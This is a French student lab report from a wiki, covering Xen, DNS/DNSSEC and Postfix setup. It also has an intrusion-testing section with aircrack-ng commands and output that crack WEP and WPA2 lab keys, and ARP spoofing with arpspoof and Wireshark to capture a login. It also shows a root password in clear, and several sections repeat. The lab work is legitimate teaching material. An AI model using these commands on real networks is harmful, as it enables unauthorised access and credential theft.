Les clef sont maintenant fonctionelle il faut donc les ajouter a GANDI, pour cela on se connecte a gandi puis on ajoute une clef KSK.
pour obtenir la cled on utilise la commande <code>cat glopglop.site-ksk.key</code> on obtien le résultat ci-dessous :
; This is a key-signing key, keyid 15337, for glopglop.site.
; Created: 20201113090442 (Fri Nov 13 09:04:42 2020)
; Publish: 20201113090442 (Fri Nov 13 09:04:42 2020)
; Activate: 20201113090442 (Fri Nov 13 09:04:42 2020)
glopglop.site. IN DNSKEY 257 3 5 AwEAAc3TCJkWFGnZSj/Q364AF7n69UaXum/no+LuEbXbGjTXLETdYk+Q gVAmIpvbJXcG0rucJTbVFaHr8IhWqf7VvkCbEGAORAkzBVXThPDR1pZR lJDEY88Lb2T6k9uHw43l2oP8vPev2eIRbU3VxUuJs++elgj32DTBA+yK p++/gz29H6PQVpkHnH81RjGdV+K1RZEwxkuev2MmB329fhMRwTsbW0BV aeXc5faRk9ZEKb7tr0p7txVv4wZEL6it01ZiNyGktwLRj8ln+cQz1GtC PY/UWnCtamycE/2k4f98sdDa6TMiguuBNOPug+ODzqGiI7LNUyF4jBbf 6NAgChwITps=

On ajoute la clef a gandi comme montrer ci-dessous en n'oubliant pas de selectionner '5(RSA/SHA-1'.
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|gandi enregistrement de la clef KSK]]
 

Pour vérifier que tout fonctionne correctement, on va sur le site 'dnsvizi.net' il nous permet d'analyser le dns et représanter la chaine d'autentification DNSSEC.
[[Fichier:DNSSEC_2020-11-13_11-59-06.png|1000px|thumb|left|Test du DNSSEC]]
 

On peut voir que maintenant on a bien le statu 'SECURE' donc tout fonctionne bien.

===Installation d'une méchagerie===
====Configuration de Postfix====
Pour recevoir le mail de vérfication de GANDI il faut sur la VM un gestionnaire de mail il faut installer mutt et postfix. On utilise les commandes ci-dessous :
apt-get install postfix
ant-get install mutt

A l'installation de 'postfix' un fenètre de configuration s'ouver.
Il faut renseigner le non du site comme 'System mail name : 'glopglop.site'

On vérifie la configuration de 'postix' en allant dans le 'main.cf'
vi /etc/postfix/main.cf

[[Fichier:Config Postfix mirage.png|1000px|thumb|left|Configuration de postfix]]
 

On a bien le non de domaine 'glopglop.site' on peut relancer 'postfix'
service postfix restart
Si le service n'est pas configurer correctement, on peut le reconfigurer avec la commande <code>dpkg-reconfigure postfix</code>
====Réception d'un message====
On peux testé la reception de message en envoyant un message a 'roor@glopglop.site'
Si tout fonctionne bien, on peux visualisé les méssage recu en tappant la commande <code>mutt</code>

[[Fichier:Reception_messages_mirage.png|1000px|thumb|left|texte descriptif]]
 

On constate que on resoit bien les message en provenance du mail de Polytech.
Pour que gandi puissent nous envoyer le mail contenant la clef de cryptage, on a besoint de pouvoir recevoirr les messages qui sont destiné a 'admin@glopglop.site'

Pour cela on va modifier le fichier 'vim /etc/aliases' en ajoutant la commande <code>admin:root</code>
On crée ensuite un <code>newaliases</code> puis on restarte bind9 avec la commance <code>service bind9 restart</code>

Attention pour les test il est conseiller d'utilisé deux boite mail différante care celle ci prenne du temps pour se mettre a jours.

====Envoie du SSL Certification Gandi====

Quand on est sure que le mail fonctionne bien avec l'envoie d'un message a destination de 'admin@glopglop.site' on peux demandé a gandi de bous envoyer la clef de cryptage.
On demande d'envoyet le ssl certification a notre VM, cela peux prendre un certain temps.

[[Fichier:SSL_Certification_Gandi_Mirage.png|1000px|thumb|left|texte descriptif]]
 

==Tests d’intrusion==

=== Description ===
Un ordinateur portable et une clef Wifi est fourni par Monsieur Redon. Pour que le clef fonctionne il est nécessite pas nécessairement de la configuration. Il faut aussi installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA

=== Installation de la clef Wifi ===
Avec la commande <code>lsusb</code> on peux voir la list des interfaces connecté aux pc. Ci-dessous les résultats obtenu.

Bus 003 Device 004: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter
Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub
Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub
Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 001 Device 004: ID 413c:2003 Dell Computer Corp. Keyboard
Bus 001 Device 003: ID 046d:c016 Logitech, Inc. Optical Wheel Mouse
Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub

La clef ubs Wifi est bien détécter.
On doit donc installer le pilote pour les clef usb RT5370 avec la commande :
apt-get install firmware-ralink
apt-get install firmware-misc-nonfree

Une fois les pilotes installer, on récupéère le nom de l'interface wifi avec la commande <code>ip l</code> et on récupère le résultat ci-dessous :
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000
link/ether 00:22:4d:7a:f1:c3 brd ff:ff:ff:ff:ff:ff
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000
link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff
5: bridge: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000
link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff
6: vmnet1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000
link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff
7: vmnet8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000
link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff
8: wlx40a5ef059784: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc mq state DOWN mode DEFAULT group default qlen 1000
link/ether 40:a5:ef:05:97:84 brd ff:ff:ff:ff:ff:ff

La clef wifi s'apelle donc <code>wlx40a5ef059784</code> on fait maintenant un <code> ip link set wlx40a5ef059784 up></code>

Avec la comande <code>dmsg</code> on vérifie que la clef wifi fonctionne bien.

=== Installation du paquetage AirCrack-ng ===
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il faut de taper la commande :
apt-get install aircrack-ng
apt-get install firmware-misc-nonfree

=== Utilisation de AirCrack pour clef WEP ===

Après avoir branché la clef WiFi, on se sert de <code>airmon-ng</code> qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.
airmon-ng
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):
airmon-ng start wlx40a5ef059784
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:
airodump-ng wlan0mon

On obtien le résultat ci dessous :

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

38:0E:4D:B0:E9:E0 -1 0 1 0 1 -1 WPA <length: 0>
04:DA:D2:9C:50:51 -30 49 834 0 9 54e. WEP WEP cracotte02
04:DA:D2:9C:50:5A -29 44 841 0 9 54e. WEP WEP cracotte11
04:DA:D2:9C:50:56 -28 53 832 9 9 54e. WEP WEP cracotte07
04:DA:D2:9C:50:57 -29 54 803 0 9 54e. WEP WEP cracotte08
04:DA:D2:9C:50:59 -30 50 833 0 9 54e. WEP WEP cracotte10
04:DA:D2:9C:50:54 -29 48 841 0 9 54e. WEP WEP cracotte05
04:DA:D2:9C:50:50 -29 50 841 0 9 54e. WEP WEP cracotte01
04:DA:D2:9C:50:5B -29 50 825 0 9 54e. WEP WEP cracotte12
04:DA:D2:9C:50:53 -33 46 843 0 9 54e. WEP WEP cracotte04
04:DA:D2:9C:50:58 -28 50 694 0 9 54e. WEP WEP cracotte09
04:DA:D2:9C:50:55 -30 49 746 0 9 54e. WEP WEP cracotte06
04:DA:D2:9C:50:52 -33 50 764 0 9 54e. WEP WEP cracotte03
00:14:1B:60:8C:28 -30 60 0 0 4 54e. WPA2 CCMP PSK kracotte09
00:14:1B:60:8C:22 -31 55 0 0 4 54e. WPA2 CCMP PSK kracotte03
00:14:1B:60:8C:27 -32 64 0 0 4 54e. WPA2 CCMP PSK kracotte08
00:14:1B:60:8C:24 -34 58 0 0 4 54e. WPA2 CCMP PSK kracotte05
00:14:1B:60:8C:23 -31 63 0 0 4 54e. WPA2 CCMP PSK kracotte04

Le réseau que nous voulons craquer est <code>cracotte05 ssid : 04:DA:D2:9C:50:54 chanel : 9</code>

On utilise la commande <code>airodump-ng -w reseau_cracotte05 -c 9 --bssid 04:DA:D2:9C:50:54 wlan0mon</code>. cela nous crée un <code>reseau_cracotte05-01.cap</code> On n'as pluq qu'a faire un <code>aircrack-ng reseau_cracotte05-01.cap </code>.

KB depth byte(vote)
0 0/ 1 F1(50176) 48(46848) A1(46080) C9(45824) 2A(45056)
1 0/ 1 DE(50944) F0(46592) 60(45824) 4D(45312) 1E(44544)
2 1/ 3 D4(47360) 98(46336) B6(45568) A7(45056) EB(45056)
3 0/ 2 00(47360) 34(46848) 4E(45824) 6F(44800) 35(44544)
4 0/ 1 00(50688) 09(45824) 50(45568) FD(45056) 5E(44032)
5 0/ 3 00(46592) BD(45824) 4A(45824) 5A(45056) 87(45056)
6 0/ 1 00(51456) 09(47104) 3A(45824) F9(45824) 04(45568)
7 0/ 1 00(51712) C9(47360) 08(46336) 56(45312) E2(44800)
8 0/ 1 00(54016) 05(45568) C1(45312) D5(44544) B7(44288)
9 0/ 2 00(47872) 56(46592) 84(45568) 88(45568) F2(45056)
10 1/ 2 09(48128) 6B(45824) D5(45824) 0C(45568) C2(45568)
11 0/ 2 99(48128) 76(47616) 99(46080) E6(46080) 06(44800)
12 2/ 4 FD(44800) DE(44544) B9(44032) 3F(43776) 94(43776)

KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:09:99:99 ]
Decrypted correctly: 100%

Et voila nous avons trouver clef du réseau wifi cracotte05

=== Utilisation de AirCrack pour clef WPA2-PSA ===

On va maintenant craquer le réseau Kracotte05 qui est un réseau WPA on sait d'avance que la clef WPA est un nombre sur 8 chiffres.
On va donc faire un "cassage par force brute" avec un fichier texte contenant tout les combination de 00000000 a 99999999.

On commence par installer Crnch avec la commande <code>sudo apt-get install -y crunch</code>

Une fois installer on génère un fichier dictionnaite.txt avec la commande <code>crunch 8 8 0123456789 >> dictionnaire_wpa.txt</code>
On relance la commande <code>airodump-ng -w reseau_kracotte05 -c 5 --bssid 00:14:1B:60:8C:24</code>
On a bien sure remplacer le ssid et le chanel par celui du wifi Kracotte05.

Puis nous lançons aircrack-ng avec la commande <code>aircrack-ng reseau_kracotte05-01.cap -w dictionnaire_wpa.txt</code>
Read 121032 packets.

# BSSID ESSID Encryption

1 00:14:1B:60:8C:24 kracotte05 No data - WEP or WPA

Choosing first network as target.

Opening reseau_kracotte05-01.cap
Read 121032 packets.

1 potential targets
Got no data packets from target network!
Quitting aircrack-ng...

On peut voir que cela prend du temps pour récupérer les data nécessaire pour effectuer le crackage 1 data toutes les 15 minutes.
Une fois que on a récupérer les data, on peux effectuer le "cassage par force brute"

Aircrack-ng 1.5.2

[00:32:18] 10323450/102795810 keys tested (2771.75 k/s)

Time left: 9 hours, 16 minutes, 11 seconds 10.04%

KEY FOUND! [ 10244444 ]

Master Key : D6 B0 55 29 8C A0 B4 C9 13 24 C9 03 8C D5 13 4B
46 A4 C2 DB 79 E7 4C BC AE B5 5A 5D 48 D7 C4 3B

Transient Key : 25 23 28 1B 21 51 4B 87 07 51 A4 8E D1 80 48 C8
54 F6 87 8B 30 DF C1 D0 E6 1A 74 87 2F 50 EC 1B
9B 24 39 29 40 E3 BD 89 CD AE 3E 81 E9 EC 16 70
79 F9 24 2E 30 4E 52 24 A9 41 30 52 E1 25 EC 85

EAPOL HMAC : 7F AC 76 7D B5 33 0C 24 20 C3 BA A2 4B DF 2F CD

On a bien trouver la clé du wifi !
On voit que cela peut prendre beaucoup de temps pour trouver la clé, d'out l'interner de couper le dictionnaire en plusieurs et lancer le traitement sur plusieurs pc des camarades de classe. Cela permet de diviser le temps de traitement par le nombre de machine utilisé.

===Exploitation de failles du système===

===Attaque de type "homme au milieu" par usurpation ARP===
Maintenant on tesnt une attaque par "homme au milieu" pour commancé, on va installer le paquetage <code>dsniff</code> pour cela on utilise la commande : <code>apt-get install dsniff</code>

On regarde dans un premier temps si le pc peut se comporter comme un routeur avec la commande <code>cat /proc/sys/net/ipv4/ip_forward</code> normalement il nous notifie '0' se qui prouve que le pc ne se comporte pas comme un routeur. On utilise la commande <code>cat /proc/sys/net/ipv4/ip_forward</code> pour faire passer la variable a 1. maintenant le PC peut se comporter comme un routeur.

On fait la commande <code>cat /proc/sys/net/ipv4/conf/all/rp_filter</code> la variable recu doit être a '0' ce qui permet aux pc de renvoyer les requètes sur l'interface qui les a recu.

Ensuite on fait un <code>ip r</code> pour récupérer l'adresse ip du routeur.
[[Fichier:Ip_r_mirage.png|1000px|thumb|left|capture de la commande ip r]]
 

On fait la commande <code>arpspoof -i bridge -t zabeth07 172.26.145.254</code>
On lance Wireshark en root en utilisant la commande <code>su</code> si celui ci n'est pas installer on fait préalablement <code>apt-get install wireshark</code>
Une fois Wireshark lancé, on filtre tout les paquets en provenance de nottre cible la zabeth07.
Il faut fauire attention de bien désativer les proxi dans firefow sinon cela ne fonctionne pas.

[[Fichier:Wireshark_mirage.png|1000px|thumb|left|capture de Wiresharkf]]
 

On peut voir que on a bien recupérer les mdp lors de la connexion aux site 'applications.polytech-lille.net'.
Non d'utilisateur : Oui le pas de calais
Mdp : le mdp

=== Intrusion sur un serveur d’application Web===

==Réalisations==

===Sécurisation de données===

===Chiffrement de données===

Parfois il est necessaire de chiffrer les données importante,d'avoir des clef USB, ou des fichier sécuriser. Pour sécuriser la clef USB, on va utilisé 'cryptsetup'
pour commancer on installe les paquetages 'lvm2' et 'cryptsetup'.
apt-get install cryptsetup
apt-get install lvm2

Le [https://doc.ubuntu-fr.org/cryptsetup site] on peut trouver la liste des commandes necessaire pour crypter le clef USB.

Premièrement on va formaté la clef usb pour avoir un disque propre avec la commande <code>mkfs.vfat -n 'Alex.G' -I /dev/sdb1</code> on obtien le nom de la clef USB avec la commande <code>df -h</code>
On a maintenant une clef USB clean qui a comme nom Alex.G et un format FAT32.

On peut lancer le cryptage de la clef USB avec la commande <code>cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb</code> Pour savoir ou les la clef USB on utilise la commande <code>lsblk</code>
On choisi un mdp pour le clef USB, puis on envoie le fichier etc sur le clef pour vérifier si il est bien encrypter. Une fois la clef crypter avec un fichier dessu, on va sur un autre pc et on, vérifie si le fichier est bien crypter.
La liste des commande utilisé est listé ci-dessous :
mount /dev/mapper/Alex.G /mnt
cp -r /etc /mnt
umount /mnt
cryptsetup luksClose Alex.G

On peut voir que le clef USB crypter fonctionne bien.
[[Fichier:ClefUSBLock_2020-11-13_11-48-55.png|1000px|thumb|left|Cryptage de la clef USB]]
 

===Inspection ARP par un élément réseau===

===Sécurisation WiFi par WPA2-EAP===

TP sysres IMA2a5 2020/2021 G5

2020-11-20T08:54:30Z

Aglaine : /* Envoie du SSL Certification Gandi */

== Introduction ==

Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système vous aurez à installer une machine virtuelle Xen et à y configurer des services. Enfin la mise en place d’un réseau WiFi sécurisé et d’un site web sécurisé vous permettent de mettre en pratiques vos connaissances en la matière.

=== Tableau Récapitulatif ===
{| class="wikitable" style="text-align: center;width: 35%;margin: auto;"
! Description !! Détails
|-
! scope="row" style="width: 40%"|ID VLAN
|style="width: 60%"|Vlan7
|-
! scope="row" style="width: 40%"|Réseau IP V4
|style="width: 60%"|193.48.57.168
|-
! scope="row" style="width: 40%"|Réseau IP V6
|style="width: 60%"|
|-
! scope="row" style="width: 40%"|Nom de de la VM
|style="width: 60%"|mirage
|-
! scope="row" style="width: 40%"|Numéro de poste
|style="width: 60%"|Zabeth06
|-
! scope="row" style="width: 40%"|Adresse du site internet version HTTP
|style="width: 60%"|
|-
! scope="row" style="width: 40%"|Adresse du site internet version HTTPS
|style="width: 60%"|
|-
|}

== Installation des systèmes d’exploitation ==

Pour installer une Machine Virtuelle, il faut d'abord se connecter sur le disque de virtualisation.
Pour cela, il faut utiliser la commande :
ssh capbreton.plil.info

=== Installation dans la machine virtuelle Xen ===

Une fois connecter, il faut lancer la création de la Machine virtuelle avec la commande :
xen-create-image --hostname=mirage --ip 193.48.57.168 --netmask=255.255.255.0 --gateway=100.64.0.5 --dist=ascii --dir=/usr/local/xen --force

L'installation prend un certain temps pour regarder si l'installation se déroule bien, on peut ouvrir un second terminale connecté en SSH a "capbreton" puis on utilise la commande :
tail -f /var/log/xen-tools/mirage.0.log

A la fin de l'installation, on obtient le mot de passe root et des informations importantes :
Installation Summary
---------------------
Hostname : mirage
Distribution : ascii
MAC Address : xxxxxxxxxxx
IP Address(es) : dynamic
SSH Fingerprint : SHA256:xxxxxxx (DSA)
SSH Fingerprint : SHA256:xxxxxxx (ECDSA)
SSH Fingerprint : SHA256:xxxxxxx (ED25519)
SSH Fingerprint : SHA256:xxxxxxx (RSA)
Root Password : DgtUlOmnBFERdfarGBsopGR

Une fois la VM créer, nous pouvons la lancer avec la commande :
xl create /etc/xen/mirage.cfg

On peut vérifier que le VM est bien démarrer avec la commande :
xl list
Pour fonctionner l'état de la VM doit être r ou -b
[[Fichier:LancementVm.PNG|1000px|thumb|left|Liste des VM en fonctionnement]]

 

On accède pour la premier fois a nottre Vm avec la commande :
xl console mirage

il demande alors le login (root) et le mdp (longue chaine précédemment générée).
Après nous être logué, on change le mot de passe qui devient : glopglopglop.

=== Configuration de la machine virtuelle Xen ===

Il faut maintenant installer les packages que nous avons besoins :
apt-get update
apt-get install VIM

Il faut configurer l'adresse IP et le mask de la VM. Pour cela on utilise la commande :
vim /etc/network/interfaces

Dans interfaces on tajoute
auto eth0
iface eth0 inet static
address 193.48.57.168
gateway 193.58.57.163
netmask 255.255.255.248

Pour que la machine soit joignable par SSH via l'extérieure il est nécessaire de configurer la passerelle et le ssh_config. Pour cela on utilise la commande :
vi /etc/ssh/ssh_config

Le fichier ssh_config doit être configurer comme ci dessous :
Host *
SendEnv LANH LC_*
HashKnownHOST yes
GSSAPIAuthentification yes

Sur Capbreton, une paserell doit être mis en place pour pouvoir connecté les VM aux monde extérieure.
Pour cela on configure ces interfacte avec la commande :
vim/etc/network/interfaces

Puis on configure la passerelle comem ci dessous :
<pre>
# The loopback network interface
auto lo
iface lo inet loopback

# Physical Network Interfaces
#
auto eth
iface eth inet static
address 192.168.0.29
netmask 255.255.255.0
gateway 192.168.0.1

auto eth0
iface eth0 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth1
iface eth1 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth2
iface eth2 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth4
iface eth4 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth5
iface eth5 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth6
iface eth6 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth7
iface eth7 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

# Main trunk bridge
#
auto Trunk
iface Trunk inet manual
bridge_ports eth4 eth5
post-up ip link set $IFACE up
post-down ip link set $IFACE down

# Virtual Network Interfaces
#

auto vlan48
iface vlan48 inet static
vlan-raw-device Trunk
address 172.26.191.21
netmask 255.255.252.0
gateway 172.26.191.254
iface vlan48 inet6 auto

auto vlan500
iface vlan500 inet manual
vlan-raw-device Trunk
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto vlan502
iface vlan502 inet manual
vlan-raw-device Trunk
post-up ip link set $IFACE up
post-down ip link set $IFACE down
# Bridge for IMA5sc group
#

auto IMA5sc
iface IMA5sc inet manual
bridge_ports eth0 eth6
# Bridge for IMA2a5
#

auto IMA2a5
iface IMA2a5 inet manual
bridge_ports eth1 eth7
# Bridge for L3MRIT group
#

auto L3MRIT
iface L3MRIT inet manual
bridge_ports eth2
# Bridge for GIS group
#

auto bridgeGIS
iface bridgeGIS inet manual
bridge_ports vlan502
</pre>

== Architecture réseau ==

===Sécurisation du réseau===

==Services Internet==

===Serveur SSH===

On peux maintenant se connecté a la VM mirage avec la commande : <code>ssh root@193.48.57.168 -p 2222</code>

===Serveur DNS===
Un serveur DNS (Domain Name System) permet d'effectuer correspondance entre un nom de domaine et une adresse IP. Grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP pour naviguer sur Ethernet. Pour installer notre propre serveur DNS nous avons utilisé Bind9.

Nous commençons tout d'abord par installer bind9 via la commande suivante : <code>apt-get install bind9</code>

==== Création et configuration named.conf.local ====
Le <code>named.conf.local</code> permet de faire pointer un nom de domaine pleinement qualifié (FQDN fully qualified domain name) sur une adresse IP.

Il faut tout d'abbord modifié le fichier <code>/etc/bind/named.conf.local</code> qui contient la configuration DNS et y déclaré les zones associées au domaine ainsi qu'un fichier de description de la zone.

[[Fichier:Mirage-config-named.conf.local.png|1000px|thumb|left|Configuration de mirage]]
 

Puis créé le fichier de configuration appelé <code>glopglop.site</code> avec la commande <code>vim /etc/bind/glopglop.site</code>

[[Fichier:Configuration_bind9.png|1000px|thumb|left|Configuration de bind9]]
 

On relance le service 'bind9' avec la commande :<code>service bind9 restart</code>

On vérifie que le DNS fonctionne bien avec le commande <code>host dns1.glopglop.site localhost</code>
[[Fichier:Dns1.glopglop.site_2020-11-13_08-57-52.png|1000px|thumb|left|Vérification du DNS en local]]
 
Le DNS fonctionne donc bien.

==== Configuration gandi.net ====
Grâce au registrar gandi.net, nous avons réservé le nom de domaine <code>glopglop.site</code>. L'extension <code>.site</code>

[[Fichier:Gandi-glopglop-VueGeneral.PNG|1000px|thumb|left|Image de la configuration de Gandi]]
 

On va maintenant ajouter un "glue record" qui est un enregistrement collé. Il permet d'associer un nom d'hôte avec une adresse IP au registre.
Glue records fournis par gandi pour associer un hostname (nom de serveur ou DNS) à l'adresse IP de notre machine. Les modifications seront effectives entre 12 et 24 heures.

[[Fichier:Mirage-Ajoue-GlueRecord.PNG|1000px|thumb|left|Image de la configuration de Gandi avec Glue Record]]
 

Une fois le "glue record" renseigner se qui va lié nottre dns a une ip, il faur renseigner les serveur de non. cela prend 27/72h.
Il faut bien faire attention que la VM soit correctement configurer avec 'bind9' car c'est lui qui donne IPv4 et IPv6 correspondant à vos noms de machines. Si ce n'est pas le cas gandi ne pourras pas liée les dns a l'ip de la machine.

[[Fichier:GandiDNS_2020-11-13_09-00-16.png|1000px|thumb|left|DNS sur GANDI]]
 

Une fois les serveuyrs de non configurer, on peux fermer GANDI.

===Sécurisation de site web par certificat===

===Sécurisation de serveur DNS par DNSSEC===
Premièrement, on ajoute <code>l'obtion dnssec-enable yes;</code> dans le fichier <code>named.conf.options</code>.
====Génération des clef asymétrique====
Il est important de bien sauvegarder la clef privée, sinon nottre système de clef ne fonctionnera pas.
pour commancer, on crée un repertoire pour stocker les clef.
cd /etc/bind
mkdir glopglop.site.dnssec
cd glopglop.site.dnssec/

Une fois dans le dossier <code>glopglop.site.dnssec</code>, on crée les clefs avec la commande<code>dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE glopglop.site</code>
On obtien :
Generating key pair...............+++++ ..........................................+++++
Kglopglop.site.+005+15337

On crée ensuite le clef asymétrique pour la signature des enregistrements, pour cela on utilise la commande <code>dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE glopglop.site</code>
On obtien :
Generating key pair................+++++ ..................................................+++++
Kglopglop.site.+005+55608

On a bien maintenant la paire de clef privée/publique. Le problème est qu'il est difficile de les distinguer avec leurs nom compliquer, il faut donc les rennomer pouyr plus de transparance.
On renomme donc les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK) puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);

mv Kglopglop.site.+005+15337.key glopglop.site-ksk.key
mv Kglopglop.site.+005+15337.private glopglop.site-ksk.private
mv Kglopglop.site.+005+55608.key glopglop.site-zsk.key
mv Kglopglop.site.+005+55608.private glopglop.site-zsk.private

[[Fichier:ClefPrivéePublique_2020-11-13_09-23-42.png|1000px|thumb|left|Clef Privée et Public]]
 

Dans <code>db.glopglop.site</code> on ajoute les deux lignes ci-dessous :
$include /etc/bind/glopglop.site.dnssec/glopglop.site-ksk.key
$include /etc/bind/glopglop.site.dnssec/glopglop.site-zsk.key

On signe la zone d'enregistremment avec la commande <code>dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk</code>
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|Generation des zones d'enregistrement]]
 

Les clef sont maintenant fonctionelle il faut donc les ajouter a GANDI, pour cela on se connecte a gandi puis on ajoute une clef KSK.
pour obtenir la cled on utilise la commande <code>cat glopglop.site-ksk.key</code> on obtien le résultat ci-dessous :
; This is a key-signing key, keyid 15337, for glopglop.site.
; Created: 20201113090442 (Fri Nov 13 09:04:42 2020)
; Publish: 20201113090442 (Fri Nov 13 09:04:42 2020)
; Activate: 20201113090442 (Fri Nov 13 09:04:42 2020)
glopglop.site. IN DNSKEY 257 3 5 AwEAAc3TCJkWFGnZSj/Q364AF7n69UaXum/no+LuEbXbGjTXLETdYk+Q gVAmIpvbJXcG0rucJTbVFaHr8IhWqf7VvkCbEGAORAkzBVXThPDR1pZR lJDEY88Lb2T6k9uHw43l2oP8vPev2eIRbU3VxUuJs++elgj32DTBA+yK p++/gz29H6PQVpkHnH81RjGdV+K1RZEwxkuev2MmB329fhMRwTsbW0BV aeXc5faRk9ZEKb7tr0p7txVv4wZEL6it01ZiNyGktwLRj8ln+cQz1GtC PY/UWnCtamycE/2k4f98sdDa6TMiguuBNOPug+ODzqGiI7LNUyF4jBbf 6NAgChwITps=

On ajoute la clef a gandi comme montrer ci-dessous en n'oubliant pas de selectionner '5(RSA/SHA-1'.
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|gandi enregistrement de la clef KSK]]
 

Pour vérifier que tout fonctionne correctement, on va sur le site 'dnsvizi.net' il nous permet d'analyser le dns et représanter la chaine d'autentification DNSSEC.
[[Fichier:DNSSEC_2020-11-13_11-59-06.png|1000px|thumb|left|Test du DNSSEC]]
 

On peut voir que maintenant on a bien le statu 'SECURE' donc tout fonctionne bien.

===Installation d'une méchagerie===
====Configuration de Postfix====
Pour recevoir le mail de vérfication de GANDI il faut sur la VM un gestionnaire de mail il faut installer mutt et postfix. On utilise les commandes ci-dessous :
apt-get install postfix
ant-get install mutt

A l'installation de 'postfix' un fenètre de configuration s'ouver.
Il faut renseigner le non du site comme 'System mail name : 'glopglop.site'

On vérifie la configuration de 'postix' en allant dans le 'main.cf'
vi /etc/postfix/main.cf

[[Fichier:Config Postfix mirage.png|1000px|thumb|left|Configuration de postfix]]
 

On a bien le non de domaine 'glopglop.site' on peut relancer 'postfix'
service postfix restart
Si le service n'est pas configurer correctement, on peut le reconfigurer avec la commande <code>dpkg-reconfigure postfix</code>
====Réception d'un message====
On peux testé la reception de message en envoyant un message a 'roor@glopglop.site'
Si tout fonctionne bien, on peux visualisé les méssage recu en tappant la commande <code>mutt</code>

[[Fichier:Reception_messages_mirage.png|1000px|thumb|left|texte descriptif]]
 

On constate que on resoit bien les message en provenance du mail de Polytech.
Pour que gandi puissent nous envoyer le mail contenant la clef de cryptage, on a besoint de pouvoir recevoirr les messages qui sont destiné a 'admin@glopglop.site'

Pour cela on va modifier le fichier 'vim /etc/aliases' en ajoutant la commande <code>admin:root</code>
On crée ensuite un <code>newaliases</code> puis on restarte bind9 avec la commance <code>service bind9 restart</code>

Attention pour les test il est conseiller d'utilisé deux boite mail différante care celle ci prenne du temps pour se mettre a jours.

====Envoie du SSL Certification Gandi====

Quand on est sure que le mail fonctionne bien avec l'envoie d'un message a destination de 'admin@glopglop.site' on peux demandé a gandi de bous envoyer la clef de cryptage.
On demande d'envoyet le ssl certification a notre VM, cela peux prendre un certain temps.

[[Fichier:SSL_Certification_Gandi_Mirage.png|200px|thumb|left|texte descriptif]]

==Tests d’intrusion==

=== Description ===
Un ordinateur portable et une clef Wifi est fourni par Monsieur Redon. Pour que le clef fonctionne il est nécessite pas nécessairement de la configuration. Il faut aussi installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA

=== Installation de la clef Wifi ===
Avec la commande <code>lsusb</code> on peux voir la list des interfaces connecté aux pc. Ci-dessous les résultats obtenu.

Bus 003 Device 004: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter
Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub
Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub
Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 001 Device 004: ID 413c:2003 Dell Computer Corp. Keyboard
